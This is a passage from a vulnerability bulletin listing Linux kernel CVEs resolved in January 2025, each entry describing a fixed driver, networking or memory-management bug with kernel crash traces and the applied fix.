In the Linux kernel, the following vulnerability has been resolved: net: wwan: t7xx: Fix FSM command timeout issue When driver processes the internal state change command, it use an asynchronous thread to process the command operation. If the main thread detects that the task has timed out, the asynchronous thread will panic when executing the completion notification because the main thread completion object has been released. BUG: unable to handle page fault for address: fffffffffffffff8 PGD 1f283a067 P4D 1f283a067 PUD 1f283c067 PMD 0 Oops: 0000 [#1] PREEMPT SMP NOPTI RIP: 0010:complete_all+0x3e/0xa0 [...] Call Trace: <TASK> ? __die_body+0x68/0xb0 ? page_fault_oops+0x379/0x3e0 ? exc_page_fault+0x69/0xa0 ? asm_exc_page_fault+0x22/0x30 ? complete_all+0x3e/0xa0 fsm_main_thread+0xa3/0x9c0 [mtk_t7xx (HASH:1400 5)] ? __pfx_autoremove_wake_function+0x10/0x10 kthread+0xd8/0x110 ? __pfx_fsm_main_thread+0x10/0x10 [mtk_t7xx (HASH:1400 5)] ? __pfx_kthread+0x10/0x10 ret_from_fork+0x38/0x50 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> [...] CR2: fffffffffffffff8 ---[ end trace 0000000000000000 ]--- Use the reference counter to ensure safe release as Sergey suggests: https://lore.kernel.org/all/da90f64c-260a-4329-87bf-1f9ff20a5951@gmail.com/ | 2025-01-15 | not yet calculated | CVE-2024-39282 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: nvmet: Don't overflow subsysnqn nvmet_root_discovery_nqn_store treats the subsysnqn string like a fixed size buffer, even though it is dynamically allocated to the size of the string. Create a new string with kstrndup instead of using the old buffer. | 2025-01-15 | not yet calculated | CVE-2024-53681 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext Access to genmask field in struct nft_set_ext results in unaligned atomic read: [ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c [ 72.131036] Mem abort info: [ 72.131213] ESR = 0x0000000096000021 [ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits [ 72.132209] SET = 0, FnV = 0 [ 72.133216] EA = 0, S1PTW = 0 [ 72.134080] FSC = 0x21: alignment fault [ 72.135593] Data abort info: [ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000 [ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000 [ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403, +pte=0068000102bb7707 [ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP [...] [ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2 [ 72.170509] Tainted: [E]=UNSIGNED_MODULE [ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023 [ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables] [ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables] [ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables] [ 72.172546] sp : ffff800081f2bce0 [ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038 [ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78 [ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78 [ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000 [ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978 [ 72.174485] x14: ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0 [ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000 [ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000 [ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000 [ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004 [ 72.176207] Call trace: [ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P) [ 72.176653] process_one_work+0x178/0x3d0 [ 72.176831] worker_thread+0x200/0x3f0 [ 72.176995] kthread+0xe8/0xf8 [ 72.177130] ret_from_fork+0x10/0x20 [ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f) [ 72.177557] ---[ end trace 0000000000000000 ]--- Align struct nft_set_ext to word size to address this and documentation it. pahole reports that this increases the size of elements for rhash and pipapo in 8 bytes on x86_64. | 2025-01-15 | not yet calculated | CVE-2024-54031 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Remove the direct link to net_device The similar patch in siw is in the link: https://git.kernel.org/rdma/rdma/c/16b87037b48889 This problem also occurred in RXE. The following analyze this problem. In the following Call Traces: " BUG: KASAN: slab-use-after-free in dev_get_flags+0x188/0x1d0 net/core/dev.c:8782 Read of size 4 at addr ffff8880554640b0 by task kworker/1:4/5295 CPU: 1 UID: 0 PID: 5295 Comm: kworker/1:4 Not tainted 6.12.0-rc3-syzkaller-00399-g9197b73fd7bb #0 Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Workqueue: infiniband ib_cache_event_task Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:377 [inline] print_report+0x169/0x550 mm/kasan/report.c:488 kasan_report+0x143/0x180 mm/kasan/report.c:601 dev_get_flags+0x188/0x1d0 net/core/dev.c:8782 rxe_query_port+0x12d/0x260 drivers/infiniband/sw/rxe/rxe_verbs.c:60 __ib_query_port drivers/infiniband/core/device.c:2111 [inline] ib_query_port+0x168/0x7d0 drivers/infiniband/core/device.c:2143 ib_cache_update+0x1a9/0xb80 drivers/infiniband/core/cache.c:1494 ib_cache_event_task+0xf3/0x1e0 drivers/infiniband/core/cache.c:1568 process_one_work kernel/workqueue.c:3229 [inline] process_scheduled_works+0xa65/0x1850 kernel/workqueue.c:3310 worker_thread+0x870/0xd30 kernel/workqueue.c:3391 kthread+0x2f2/0x390 kernel/kthread.c:389 ret_from_fork+0x4d/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 </TASK> " 1). In the link [1], " infiniband syz2: set down " This means that on 839.350575, the event ib_cache_event_task was sent andi queued in ib_wq. 2). In the link [1], " team0 (unregistering): Port device team_slave_0 removed " It indicates that before 843.251853, the net device should be freed. 3). In the link [1], " BUG: KASAN: slab-use-after-free in dev_get_flags+0x188/0x1d0 " This means that on 850.559070, this slab-use-after-free problem occurred. In all, on 839.350575, the event ib_cache_event_task was sent and queued in ib_wq, before 843.251853, the net device veth was freed. on 850.559070, this event was executed, and the mentioned freed net device was called. Thus, the above call trace occurred. [1] https://syzkaller.appspot.com/x/log.txt?x=12e7025f980000 | 2025-01-15 | not yet calculated | CVE-2024-57795 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Skip restore TC rules for vport rep without loaded flag During driver unload, unregister_netdev is called after unloading vport rep. So, the mlx5e_rep_priv is already freed while trying to get rpriv->netdev, or walk rpriv->tc_ht, which results in use-after-free. So add the checking to make sure access the data of vport rep which is still loaded. | 2025-01-15 | not yet calculated | CVE-2024-57801 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netrom: check buffer length before accessing it Syzkaller reports an uninit value read from ax25cmp when sending raw message through ieee802154 implementation. ===================================================== BUG: KMSAN: uninit-value in ax25cmp+0x3a5/0x460 net/ax25/ax25_addr.c:119 ax25cmp+0x3a5/0x460 net/ax25/ax25_addr.c:119 nr_dev_get+0x20e/0x450 net/netrom/nr_route.c:601 nr_route_frame+0x1a2/0xfc0 net/netrom/nr_route.c:774 nr_xmit+0x5a/0x1c0 net/netrom/nr_dev.c:144 __netdev_start_xmit include/linux/netdevice.h:4940 [inline] netdev_start_xmit include/linux/netdevice.h:4954 [inline] xmit_one net/core/dev.c:3548 [inline] dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564 __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349 dev_queue_xmit include/linux/netdevice.h:3134 [inline] raw_sendmsg+0x654/0xc10 net/ieee802154/socket.c:299 ieee802154_sock_sendmsg+0x91/0xc0 net/ieee802154/socket.c:96 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x307/0x490 net/socket.c:2674 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768 slab_alloc_node mm/slub.c:3478 [inline] kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560 __alloc_skb+0x318/0x740 net/core/skbuff.c:651 alloc_skb include/linux/skbuff.h:1286 [inline] alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334 sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2780 sock_alloc_send_skb include/net/sock.h:1884 [inline] raw_sendmsg+0x36d/0xc10 net/ieee802154/socket.c:282 ieee802154_sock_sendmsg+0x91/0xc0 net/ieee802154/socket.c:96 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] ____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584 ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638 __sys_sendmsg net/socket.c:2667 [inline] __do_sys_sendmsg net/socket.c:2676 [inline] __se_sys_sendmsg net/socket.c:2674 [inline] __x64_sys_sendmsg+0x307/0x490 net/socket.c:2674 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b CPU: 0 PID: 5037 Comm: syz-executor166 Not tainted 6.7.0-rc7-syzkaller-00003-gfbafc3e621c3 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 ===================================================== This issue occurs because the skb buffer is too small, and it's actual allocation is aligned. This hides an actual issue, which is that nr_route_frame does not validate the buffer size before using it. Fix this issue by checking skb->len before accessing any fields in skb->data. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-01-15 | not yet calculated | CVE-2024-57802 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: fix memory leak in tcp_conn_request() If inet_csk_reqsk_queue_hash_add() return false, tcp_conn_request() will return without free the dst memory, which allocated in af_ops->route_req. Here is the kmemleak stack: unreferenced object 0xffff8881198631c0 (size 240): comm "softirq", pid 0, jiffies 4299266571 (age 1802.392s) hex dump (first 32 bytes): 00 10 9b 03 81 88 ff ff 80 98 da bc ff ff ff ff ................ 81 55 18 bb ff ff ff ff 00 00 00 00 00 00 00 00 .U.............. backtrace: [<ffffffffb93e8d4c>] kmem_cache_alloc+0x60c/0xa80 [<ffffffffba11b4c5>] dst_alloc+0x55/0x250 [<ffffffffba227bf6>] rt_dst_alloc+0x46/0x1d0 [<ffffffffba23050a>] __mkroute_output+0x29a/0xa50 [<ffffffffba23456b>] ip_route_output_key_hash+0x10b/0x240 [<ffffffffba2346bd>] ip_route_output_flow+0x1d/0x90 [<ffffffffba254855>] inet_csk_route_req+0x2c5/0x500 [<ffffffffba26b331>] tcp_conn_request+0x691/0x12c0 [<ffffffffba27bd08>] tcp_rcv_state_process+0x3c8/0x11b0 [<ffffffffba2965c6>] tcp_v4_do_rcv+0x156/0x3b0 [<ffffffffba299c98>] tcp_v4_rcv+0x1cf8/0x1d80 [<ffffffffba239656>] ip_protocol_deliver_rcu+0xf6/0x360 [<ffffffffba2399a6>] ip_local_deliver_finish+0xe6/0x1e0 [<ffffffffba239b8e>] ip_local_deliver+0xee/0x360 [<ffffffffba239ead>] ip_rcv+0xad/0x2f0 [<ffffffffba110943>] __netif_receive_skb_one_core+0x123/0x140 Call dst_release() to free the dst memory when inet_csk_reqsk_queue_hash_add() return false in tcp_conn_request(). | 2025-01-15 | not yet calculated | CVE-2024-57841 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix fault on fd close after unbind If userspace holds an fd open, unbinds the device and then closes it, the driver shouldn't try to access the hardware. Protect it by using drm_dev_enter()/drm_dev_exit(). This fixes the following page fault: <6> [IGT] xe_wedged: exiting, ret=98 <1> BUG: unable to handle page fault for address: ffffc901bc5e508c <1> #PF: supervisor read access in kernel mode <1> #PF: error_code(0x0000) - not-present page ... <4> xe_lrc_update_timestamp+0x1c/0xd0 [xe] <4> xe_exec_queue_update_run_ticks+0x50/0xb0 [xe] <4> xe_exec_queue_fini+0x16/0xb0 [xe] <4> __guc_exec_queue_fini_async+0xc4/0x190 [xe] <4> guc_exec_queue_fini_async+0xa0/0xe0 [xe] <4> guc_exec_queue_fini+0x23/0x40 [xe] <4> xe_exec_queue_destroy+0xb3/0xf0 [xe] <4> xe_file_close+0xd4/0x1a0 [xe] <4> drm_file_free+0x210/0x280 [drm] <4> drm_close_helper.isra.0+0x6d/0x80 [drm] <4> drm_release_noglobal+0x20/0x90 [drm] (cherry picked from commit 4ca1fd418338d4d135428a0eb1e16e3b3ce17ee8) | 2025-01-15 | not yet calculated | CVE-2024-57844 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Remove direct link to net_device Do not manage a per device direct link to net_device. Rely on associated ib_devices net_device management, not doubling the effort locally. A badly managed local link to net_device was causing a 'KASAN: slab-use-after-free' exception during siw_query_port() call. | 2025-01-15 | not yet calculated | CVE-2024-57857 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mptcp: fix TCP options overflow. Syzbot reported the following splat: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f] CPU: 1 UID: 0 PID: 5836 Comm: sshd Not tainted 6.13.0-rc3-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/25/2024 RIP: 0010:_compound_head include/linux/page-flags.h:242 [inline] RIP: 0010:put_page+0x23/0x260 include/linux/mm.h:1552 Code: 90 90 90 90 90 90 90 55 41 57 41 56 53 49 89 fe 48 bd 00 00 00 00 00 fc ff df e8 f8 5e 12 f8 49 8d 5e 08 48 89 d8 48 c1 e8 03 <80> 3c 28 00 74 08 48 89 df e8 8f c7 78 f8 48 8b 1b 48 89 de 48 83 RSP: 0000:ffffc90003916c90 EFLAGS: 00010202 RAX: 0000000000000001 RBX: 0000000000000008 RCX: ffff888030458000 RDX: 0000000000000100 RSI: 0000000000000000 RDI: 0000000000000000 RBP: dffffc0000000000 R08: ffffffff898ca81d R09: 1ffff110054414ac R10: dffffc0000000000 R11: ffffed10054414ad R12: 0000000000000007 R13: ffff88802a20a542 R14: 0000000000000000 R15: 0000000000000000 FS: 00007f34f496e800(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f9d6ec9ec28 CR3: 000000004d260000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> skb_page_unref include/linux/skbuff_ref.h:43 [inline] __skb_frag_unref include/linux/skbuff_ref.h:56 [inline] skb_release_data+0x483/0x8a0 net/core/skbuff.c:1119 skb_release_all net/core/skbuff.c:1190 [inline] __kfree_skb+0x55/0x70 net/core/skbuff.c:1204 tcp_clean_rtx_queue net/ipv4/tcp_input.c:3436 [inline] tcp_ack+0x2442/0x6bc0 net/ipv4/tcp_input.c:4032 tcp_rcv_state_process+0x8eb/0x44e0 net/ipv4/tcp_input.c:6805 tcp_v4_do_rcv+0x77d/0xc70 net/ipv4/tcp_ipv4.c:1939 tcp_v4_rcv+0x2dc0/0x37f0 net/ipv4/tcp_ipv4.c:2351 ip_protocol_deliver_rcu+0x22e/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x341/0x5f0 net/ipv4/ip_input.c:233 NF_HOOK+0x3a4/0x450 include/linux/netfilter.h:314 NF_HOOK+0x3a4/0x450 include/linux/netfilter.h:314 __netif_receive_skb_one_core net/core/dev.c:5672 [inline] __netif_receive_skb+0x2bf/0x650 net/core/dev.c:5785 process_backlog+0x662/0x15b0 net/core/dev.c:6117 __napi_poll+0xcb/0x490 net/core/dev.c:6883 napi_poll net/core/dev.c:6952 [inline] net_rx_action+0x89b/0x1240 net/core/dev.c:7074 handle_softirqs+0x2d4/0x9b0 kernel/softirq.c:561 __do_softirq kernel/softirq.c:595 [inline] invoke_softirq kernel/softirq.c:435 [inline] __irq_exit_rcu+0xf7/0x220 kernel/softirq.c:662 irq_exit_rcu+0x9/0x30 kernel/softirq.c:678 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1049 [inline] sysvec_apic_timer_interrupt+0x57/0xc0 arch/x86/kernel/apic/apic.c:1049 asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:702 RIP: 0033:0x7f34f4519ad5 Code: 85 d2 74 0d 0f 10 02 48 8d 54 24 20 0f 11 44 24 20 64 8b 04 25 18 00 00 00 85 c0 75 27 41 b8 08 00 00 00 b8 0f 01 00 00 0f 05 <48> 3d 00 f0 ff ff 76 75 48 8b 15 24 73 0d 00 f7 d8 64 89 02 48 83 RSP: 002b:00007ffec5b32ce0 EFLAGS: 00000246 RAX: 0000000000000001 RBX: 00000000000668a0 RCX: 00007f34f4519ad5 RDX: 00007ffec5b32d00 RSI: 0000000000000004 RDI: 0000564f4bc6cae0 RBP: 0000564f4bc6b5a0 R08: 0000000000000008 R09: 0000000000000000 R10: 00007ffec5b32de8 R11: 0000000000000246 R12: 0000564f48ea8aa4 R13: 0000000000000001 R14: 0000564f48ea93e8 R15: 00007ffec5b32d68 </TASK> Eric noted a probable shinfo->nr_frags corruption, which indeed occurs. The root cause is a buggy MPTCP option len computation in some circumstances: the ADD_ADDR option should be mutually exclusive with DSS since the blamed commit. Still, mptcp_established_options_add_addr() tries to set the relevant info in mptcp_out_options, if ---truncated--- | 2025-01-15 | not yet calculated | CVE-2024-57882 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: hugetlb: independent PMD page table shared count The folio refcount may be increased unexpectly through try_get_folio() by caller such as split_huge_pages. In huge_pmd_unshare(), we use refcount to check whether a pmd page table is shared. The check is incorrect if the refcount is increased by the above caller, and this can cause the page table leaked: BUG: Bad page state in process sh pfn:109324 page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x66 pfn:0x109324 flags: 0x17ffff800000000(node=0|zone=2|lastcpupid=0xfffff) page_type: f2(table) raw: 017ffff800000000 0000000000000000 0000000000000000 0000000000000000 raw: 0000000000000066 0000000000000000 00000000f2000000 0000000000000000 page dumped because: nonzero mapcount ... CPU: 31 UID: 0 PID: 7515 Comm: sh Kdump: loaded Tainted: G B 6.13.0-rc2master+ #7 Tainted: [B]=BAD_PAGE Hardware name: QEMU KVM Virtual Machine, BIOS 0.0.0 02/06/2015 Call trace: show_stack+0x20/0x38 (C) dump_stack_lvl+0x80/0xf8 dump_stack+0x18/0x28 bad_page+0x8c/0x130 free_page_is_bad_report+0xa4/0xb0 free_unref_page+0x3cc/0x620 __folio_put+0xf4/0x158 split_huge_pages_all+0x1e0/0x3e8 split_huge_pages_write+0x25c/0x2d8 full_proxy_write+0x64/0xd8 vfs_write+0xcc/0x280 ksys_write+0x70/0x110 __arm64_sys_write+0x24/0x38 invoke_syscall+0x50/0x120 el0_svc_common.constprop.0+0xc8/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x34/0x128 el0t_64_sync_handler+0xc8/0xd0 el0t_64_sync+0x190/0x198 The issue may be triggered by damon, offline_page, page_idle, etc, which will increase the refcount of page table. 1. The page table itself will be discarded after reporting the "nonzero mapcount". 2. The HugeTLB page mapped by the page table miss freeing since we treat the page table as shared and a shared page table will not be unmapped. Fix it by introducing independent PMD page table shared count. As described by comment, pt_index/pt_mm/pt_frag_refcount are used for s390 gmap, x86 pgds and powerpc, pt_share_count is used for x86/arm64/riscv pmds, so we can reuse the field as pt_share_count. | 2025-01-15 | not yet calculated | CVE-2024-57883 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm: vmscan: account for free pages to prevent infinite Loop in throttle_direct_reclaim() The task sometimes continues looping in throttle_direct_reclaim() because allow_direct_reclaim(pgdat) keeps returning false. #0 [ffff80002cb6f8d0] __switch_to at ffff8000080095ac #1 [ffff80002cb6f900] __schedule at ffff800008abbd1c #2 [ffff80002cb6f990] schedule at ffff800008abc50c #3 [ffff80002cb6f9b0] throttle_direct_reclaim at ffff800008273550 #4 [ffff80002cb6fa20] try_to_free_pages at ffff800008277b68 #5 [ffff80002cb6fae0] __alloc_pages_nodemask at ffff8000082c4660 #6 [ffff80002cb6fc50] alloc_pages_vma at ffff8000082e4a98 #7 [ffff80002cb6fca0] do_anonymous_page at ffff80000829f5a8 #8 [ffff80002cb6fce0] __handle_mm_fault at ffff8000082a5974 #9 [ffff80002cb6fd90] handle_mm_fault at ffff8000082a5bd4 At this point, the pgdat contains the following two zones: NODE: 4 ZONE: 0 ADDR: ffff00817fffe540 NAME: "DMA32" SIZE: 20480 MIN/LOW/HIGH: 11/28/45 VM_STAT: NR_FREE_PAGES: 359 NR_ZONE_INACTIVE_ANON: 18813 NR_ZONE_ACTIVE_ANON: 0 NR_ZONE_INACTIVE_FILE: 50 NR_ZONE_ACTIVE_FILE: 0 NR_ZONE_UNEVICTABLE: 0 NR_ZONE_WRITE_PENDING: 0 NR_MLOCK: 0 NR_BOUNCE: 0 NR_ZSPAGES: 0 NR_FREE_CMA_PAGES: 0 NODE: 4 ZONE: 1 ADDR: ffff00817fffec00 NAME: "Normal" SIZE: 8454144 PRESENT: 98304 MIN/LOW/HIGH: 68/166/264 VM_STAT: NR_FREE_PAGES: 146 NR_ZONE_INACTIVE_ANON: 94668 NR_ZONE_ACTIVE_ANON: 3 NR_ZONE_INACTIVE_FILE: 735 NR_ZONE_ACTIVE_FILE: 78 NR_ZONE_UNEVICTABLE: 0 NR_ZONE_WRITE_PENDING: 0 NR_MLOCK: 0 NR_BOUNCE: 0 NR_ZSPAGES: 0 NR_FREE_CMA_PAGES: 0 In allow_direct_reclaim(), while processing ZONE_DMA32, the sum of inactive/active file-backed pages calculated in zone_reclaimable_pages() based on the result of zone_page_state_snapshot() is zero. Additionally, since this system lacks swap, the calculation of inactive/ active anonymous pages is skipped. crash> p nr_swap_pages nr_swap_pages = $1937 = { counter = 0 } As a result, ZONE_DMA32 is deemed unreclaimable and skipped, moving on to the processing of the next zone, ZONE_NORMAL, despite ZONE_DMA32 having free pages significantly exceeding the high watermark. The problem is that the pgdat->kswapd_failures hasn't been incremented. crash> px ((struct pglist_data *) 0xffff00817fffe540)->kswapd_failures $1935 = 0x0 This is because the node deemed balanced. The node balancing logic in balance_pgdat() evaluates all zones collectively. If one or more zones (e.g., ZONE_DMA32) have enough free pages to meet their watermarks, the entire node is deemed balanced. This causes balance_pgdat() to exit early before incrementing the kswapd_failures, as it considers the overall memory state acceptable, even though some zones (like ZONE_NORMAL) remain under significant pressure. The patch ensures that zone_reclaimable_pages() includes free pages (NR_FREE_PAGES) in its calculation when no other reclaimable pages are available (e.g., file-backed or anonymous pages). This change prevents zones like ZONE_DMA32, which have sufficient free pages, from being mistakenly deemed unreclaimable. By doing so, the patch ensures proper node balancing, avoids masking pressure on other zones like ZONE_NORMAL, and prevents infinite loops in throttle_direct_reclaim() caused by allow_direct_reclaim(pgdat) repeatedly returning false. The kernel hangs due to a task stuck in throttle_direct_reclaim(), caused by a node being incorrectly deemed balanced despite pressure in certain zones, such as ZONE_NORMAL. This issue arises from zone_reclaimable_pages ---truncated--- | 2025-01-15 | not yet calculated | CVE-2024-57884 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm/kmemleak: fix sleeping function called from invalid context at print message Address a bug in the kernel that triggers a "sleeping function called from invalid context" warning when /sys/kernel/debug/kmemleak is printed under specific conditions: - CONFIG_PREEMPT_RT=y - Set SELinux as the LSM for the system - Set kptr_restrict to 1 - kmemleak buffer contains at least one item BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48 in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 136, name: cat preempt_count: 1, expected: 0 RCU nest depth: 2, expected: 2 6 locks held by cat/136: #0: ffff32e64bcbf950 (&p->lock){+.+.}-{3:3}, at: seq_read_iter+0xb8/0xe30 #1: ffffafe6aaa9dea0 (scan_mutex){+.+.}-{3:3}, at: kmemleak_seq_start+0x34/0x128 #3: ffff32e6546b1cd0 (&object->lock){....}-{2:2}, at: kmemleak_seq_show+0x3c/0x1e0 #4: ffffafe6aa8d8560 (rcu_read_lock){....}-{1:2}, at: has_ns_capability_noaudit+0x8/0x1b0 #5: ffffafe6aabbc0f8 (notif_lock){+.+.}-{2:2}, at: avc_compute_av+0xc4/0x3d0 irq event stamp: 136660 hardirqs last enabled at (136659): [<ffffafe6a80fd7a0>] _raw_spin_unlock_irqrestore+0xa8/0xd8 hardirqs last disabled at (136660): [<ffffafe6a80fd85c>] _raw_spin_lock_irqsave+0x8c/0xb0 softirqs last enabled at (0): [<ffffafe6a5d50b28>] copy_process+0x11d8/0x3df8 softirqs last disabled at (0): [<0000000000000000>] 0x0 Preemption disabled at: [<ffffafe6a6598a4c>] kmemleak_seq_show+0x3c/0x1e0 CPU: 1 UID: 0 PID: 136 Comm: cat Tainted: G E 6.11.0-rt7+ #34 Tainted: [E]=UNSIGNED_MODULE Hardware name: linux,dummy-virt (DT) Call trace: dump_backtrace+0xa0/0x128 show_stack+0x1c/0x30 dump_stack_lvl+0xe8/0x198 dump_stack+0x18/0x20 rt_spin_lock+0x8c/0x1a8 avc_perm_nonode+0xa0/0x150 cred_has_capability.isra.0+0x118/0x218 selinux_capable+0x50/0x80 security_capable+0x7c/0xd0 has_ns_capability_noaudit+0x94/0x1b0 has_capability_noaudit+0x20/0x30 restricted_pointer+0x21c/0x4b0 pointer+0x298/0x760 vsnprintf+0x330/0xf70 seq_printf+0x178/0x218 print_unreferenced+0x1a4/0x2d0 kmemleak_seq_show+0xd0/0x1e0 seq_read_iter+0x354/0xe30 seq_read+0x250/0x378 full_proxy_read+0xd8/0x148 vfs_read+0x190/0x918 ksys_read+0xf0/0x1e0 __arm64_sys_read+0x70/0xa8 invoke_syscall.constprop.0+0xd4/0x1d8 el0_svc+0x50/0x158 el0t_64_sync+0x17c/0x180 %pS and %pK, in the same back trace line, are redundant, and %pS can void %pK service in certain contexts. %pS alone already provides the necessary information, and if it cannot resolve the symbol, it falls back to printing the raw address voiding the original intent behind the %pK. Additionally, %pK requires a privilege check CAP_SYSLOG enforced through the LSM, which can trigger a "sleeping function called from invalid context" warning under RT_PREEMPT kernels when the check occurs in an atomic context. This issue may also affect other LSMs. This change avoids the unnecessary privilege check and resolves the sleeping function warning without any loss of information. | 2025-01-15 | not yet calculated | CVE-2024-57885 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix new damon_target objects leaks on damon_commit_targets() Patch series "mm/damon/core: fix memory leaks and ignored inputs from damon_commit_ctx()". Due to two bugs in damon_commit_targets() and damon_commit_schemes(), which are called from damon_commit_ctx(), some user inputs can be ignored, and some mmeory objects can be leaked. Fix those. Note that only DAMON sysfs interface users are affected. Other DAMON core API user modules that more focused more on simple and dedicated production usages, including DAMON_RECLAIM and DAMON_LRU_SORT are not using the buggy function in the way, so not affected. This patch (of 2): When new DAMON targets are added via damon_commit_targets(), the newly created targets are not deallocated when updating the internal data (damon_commit_target()) is failed. Worse yet, even if the setup is successfully done, the new target is not linked to the context. Hence, the new targets are always leaked regardless of the internal data setup failure. Fix the leaks. | 2025-01-15 | not yet calculated | CVE-2024-57886 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm: adv7511: Fix use-after-free in adv7533_attach_dsi() The host_node pointer was assigned and freed in adv7533_parse_dt(), and later, adv7533_attach_dsi() uses the same. Fix this use-after-free issue by dropping of_node_put() in adv7533_parse_dt() and calling of_node_put() in error path of probe() and also in the remove(). | 2025-01-15 | not yet calculated | CVE-2024-57887 |
| Linux--Linux |
